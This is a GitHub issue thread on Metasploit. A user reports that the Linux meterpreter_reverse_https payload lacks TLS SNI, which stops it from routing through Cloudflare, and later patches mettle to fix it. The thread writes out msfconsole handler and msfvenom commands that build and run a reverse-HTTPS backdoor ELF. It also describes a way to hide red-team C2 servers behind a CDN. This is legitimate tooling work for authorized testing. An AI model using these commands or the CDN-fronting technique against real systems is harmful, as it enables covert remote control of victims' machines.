Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Why doesn't msfvenom have an option like SNI? #19680

Open
jiakun02 opened this issue Nov 27, 2024 · 10 comments
Open

Why doesn't msfvenom have an option like SNI? #19680

jiakun02 opened this issue Nov 27, 2024 · 10 comments
Labels
question Questions about Metasploit Usage

Comments

@jiakun02
Copy link

The domain name hosted by cloudflare requires SNI, but the backdoor program for https reverse connection generated by msfvenom on the Linux platform does not carry SNI, only the Windows platform has it.
@jiakun02 jiakun02 added the question Questions about Metasploit Usage label Nov 27, 2024
@jiakun02 jiakun02 changed the title Why doesn't msfvenom have an option like SslServerNameIndication? Why doesn't msfvenom have an option like SNI? Nov 27, 2024
@smcintyre-r7
Copy link
Contributor

I think in most cases we don't validate the SSL certificate that's used for the HTTPS connection. The underlying Meterpreter protocol uses it's own encryption and we offer peer validation through other means. Typically when I see SNI being configured, it's server side anyways.

Is there something that isn't working that you think should be working and if so can you please provide steps that we can use to replicate it?

@jiakun02 jiakun02 closed this as completed Dec 3, 2024
@jiakun02
Copy link
Author

jiakun02 commented Dec 3, 2024
edited
Loading

I think in most cases we don't validate the SSL certificate that's used for the HTTPS connection. The underlying Meterpreter protocol uses it's own encryption and we offer peer validation through other means. Typically when I see SNI being configured, it's server side anyways.

Is there something that isn't working that you think should be working and if so can you please provide steps that we can use to replicate it?

Nowadays, network architectures are changing a lot. Cloudflare usually uses shared traffic devices. If the https traffic they receive from the client does not carry SNI, it will not know which domain name in their shared pool this request corresponds to, because they use the same device for many domain names. When they identify https traffic, they need to forward it to the user's backend server based on SNI.

Reproduction steps:

Step 1:

use exploit/multi/handler

set payload linux/x64/meterpreter_reverse_https

set lhost 0.0.0.0

set lport 443

run

Step 2:

  1. Register a domain name, or use an existing one. If you use an existing domain name, cancel the previous resolution of the domain name first. If it is a new domain name, you do not need to cancel it. Then go to Cloudflare to add this domain name

  2. After adding, you will get 2 name servers provided by Cloudflare. Then go to the domain hosting platform to modify the name server corresponding to your domain name and change it to the name server provided by Cloudflare

  3. Add two A records, @ root resolution and www resolution respectively

  4. Turn off Cloudflare's cache, otherwise you will need to clean it up manually in Cloudflare's dashboard

Step 3:
Use commands such as ping, nslookup, dig or host to check whether DNS resolution is effective

Step 4:
msfvenom -p linux/x64/meterpreter_reverse_https lhost=your domain lport=443 -f elf -o test.elf

Step 5:
Execute test.elf
chmod +x test.elf
./test.elf

Step 6:
Open wireshark to capture the data packet, and you can see that SNI is not carried

Step 7:
Observe msfconsole and you will find that no connection is received

@jiakun02
Copy link
Author

jiakun02 commented Dec 3, 2024

This is the traffic carrying SNI, which can communicate normally:
image
This is your template without SNI, and it cannot communicate through CDN agents such as cloudflare:
image
The elf executable file generated by your template can only be used without a proxy. However, in today's red-blue confrontation, the network architecture is becoming increasingly complex. There are many vendors like Cloudflare. The red team hopes to use large vendors to hide the real backend server. Based on this situation, https communication must carry SNI, otherwise communication will not be possible.

@jiakun02 jiakun02 reopened this Dec 3, 2024
@smcintyre-r7
Copy link
Contributor

Oh okay, that makes a lot more sense. Thanks your detailed response.

@jiakun02
Copy link
Author

jiakun02 commented Dec 4, 2024

Oh okay, that makes a lot more sense. Thanks your detailed response.

If the template is source code written in C language, I can help you modify it. However, I'm sorry, I don't know how to modify it. I can only hope that you can find time to do it.

@smcintyre-r7
Copy link
Contributor

Well in the case of the linux/x64/meterpreter_reverse_https payload, it's probably going to be an issue with mettle. I confirmed using a debugger that the hostname is what's patched into mettle, and not an IP address like was originally thinking may have been the case.

We may not have time to look into this for at least a few weeks but if you wanted to take a shot, I'd start looking at these files more closely:

You should be able to test things by building mettle and run it with an HTTPS transport using the --uri option. That'd be the fastest way to do it that I can think of.

@jiakun02
Copy link
Author

jiakun02 commented Dec 5, 2024

Well in the case of the linux/x64/meterpreter_reverse_https payload, it's probably going to be an issue with mettle. I confirmed using a debugger that the hostname is what's patched into mettle, and not an IP address like was originally thinking may have been the case.

We may not have time to look into this for at least a few weeks but if you wanted to take a shot, I'd start looking at these files more closely:

You should be able to test things by building mettle and run it with an HTTPS transport using the --uri option. That'd be the fastest way to do it that I can think of.

Ok, thanks, I'll take a look and try to fix it

@jiakun02
Copy link
Author

jiakun02 commented Dec 7, 2024

Sorry, I tried but couldn't solve it. Testing with build/linux.x86_64/bin/mettle still doesn't carry SNI. I don't know why.

@jiakun02
Copy link
Author

jiakun02 commented Dec 7, 2024
edited
Loading

I solved it. Now, I let the request carry SNI, as shown below:
image
my test action is as follows:
image
I will open a pull request with this account.
It took me several days to find a solution. When the target machine is a Linux system, using the meterpreter_reverse_https payload it is now finally possible to communicate with the CDN, which will forward to the real service based on the SNI, making it easier for those who want to hide the C2.

@jiakun02 jiakun02 mentioned this issue Dec 7, 2024
Merged
@jiakun02
Copy link
Author

My last commit was to add SNI in the TLS handshake packet. Although the data packet showed that SNI was carried in it, it lacked the options required for encryption suite and key exchange, which still made it impossible to complete the TLS handshake. Now I have fixed this problem and can complete the TLS handshake and transmit the attack payload.

PR is here:
rapid7/mettle#270

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
question Questions about Metasploit Usage
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@smcintyre-r7 @jiakun02